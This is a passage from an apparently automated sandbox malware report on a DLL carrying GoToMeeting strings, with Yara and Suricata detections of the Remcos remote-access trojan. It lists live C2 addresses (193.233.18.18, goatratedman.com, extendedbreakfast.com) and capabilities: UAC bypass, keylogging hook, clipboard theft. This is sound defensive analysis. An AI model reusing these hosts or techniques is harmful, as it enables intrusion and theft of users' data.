              Source: Yara matchFile source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7496, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7556, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7572, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7580, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7644, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7668, type: MEMORYSTR

              Privilege Escalation

              barindex
              Contains functionality to bypass UAC (CMSTPLUA)
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B074FD _wcslen,CoGetObject,12_2_02B074FD
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A074FD _wcslen,CoGetObject,15_2_02A074FD
              Source: 7P7cuKWTfN.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
              Source: 7P7cuKWTfN.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.1_builds\output\G2M.pdb source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B1C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_02B1C291
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B09253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_02B09253
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B0C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_02B0C34D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B09665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_02B09665
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B19AF5 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_02B19AF5
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B0BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_02B0BB30
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B0783C FindFirstFileW,FindNextFileW,12_2_02B0783C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B0880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_02B0880C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B0BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_02B0BD37
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A1C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_02A1C291
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A09253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_02A09253
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A0C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_02A0C34D
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A09665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_02A09665
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A19AF5 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_02A19AF5
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A0BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_02A0BB30
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A0783C FindFirstFileW,FindNextFileW,15_2_02A0783C
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A0880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_02A0880C
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A0BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_02A0BD37
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B07C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_02B07C97

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49737 -> 193.233.18.18:5140
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49774 -> 193.233.18.18:4050
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49735 -> 193.233.18.18:4050
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49817 -> 193.233.18.18:5140
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49858 -> 193.233.18.18:4050
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49907 -> 193.233.18.18:5140
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49960 -> 193.233.18.18:4050
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50009 -> 193.233.18.18:5140
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50010 -> 193.233.18.18:4050
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50011 -> 193.233.18.18:5140
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50013 -> 193.233.18.18:5140
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50016 -> 193.233.18.18:4050
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50018 -> 193.233.18.18:4050
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50022 -> 193.233.18.18:4050
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50021 -> 193.233.18.18:5140
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50019 -> 193.233.18.18:5140
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50024 -> 193.233.18.18:4050
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50012 -> 193.233.18.18:4050
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50023 -> 193.233.18.18:5140
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50017 -> 193.233.18.18:5140
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50020 -> 193.233.18.18:4050
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50014 -> 193.233.18.18:4050
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50015 -> 193.233.18.18:5140
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 193.233.18.18 5140Jump to behavior
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: goatratedman.com
              Source: Malware configuration extractorURLs: extendedbreakfast.com
              Source: global trafficTCP traffic: 192.168.2.4:49735 -> 193.233.18.18:4050
              Source: Joe Sandbox ViewASN Name: REDCOM-ASRedcomKhabarovskRussiaRU REDCOM-ASRedcomKhabarovskRussiaRU
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B04B96 WaitForSingleObject,SetEvent,recv,12_2_02B04B96
              Source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: eCMD_URL_Set_manageMaterialsURL www.yahoo.com equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: goatratedman.com
              Source: global trafficDNS traffic detected: DNS query: extendedbreakfast.com
              Source: rundll32.exe, regsvr32.exeString found in binary or memory: http://geoplugin.net/json.gp
              Source: loaddll32.exe, 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://support.gotomeeting.com/ics/support/default.asp?deptID=5641&task=knowledge&questionID=4517Lea
              Source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.gotomeeting.comInetAPI::initializeForG2M()InetAPI::shutdown()..
              Source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
              Source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html.....................
              Source: rundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.vidsoft.de/xmlns/meetingcontrolprotocol
              Source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.gotomeeting.comhttps://www.gotowebinar.comhttps://www.gototraining.comhwId

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to register a low level keyboard hook
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B0A2B8 SetWindowsHookExA 0000000D,02B0A2A4,0000000012_2_02B0A2B8
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B0B70E OpenClipboard,GetClipboardData,CloseClipboard,12_2_02B0B70E
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_02B168C1
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_02A168C1
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B0B70E OpenClipboard,GetClipboardData,CloseClipboard,12_2_02B0B70E
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B0A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_02B0A3E0

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPE
